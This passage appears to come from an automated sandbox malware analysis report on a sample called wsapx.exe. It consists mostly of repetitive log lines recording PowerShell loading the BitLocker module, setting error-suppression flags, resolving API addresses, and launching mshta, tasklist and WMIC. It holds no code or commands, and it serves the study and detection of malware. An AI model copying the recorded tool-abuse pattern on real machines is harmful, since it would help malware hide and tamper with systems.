Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\wsapx.exe

Code function: 0_2_00007FF7C71B5820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF7C71B5820

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
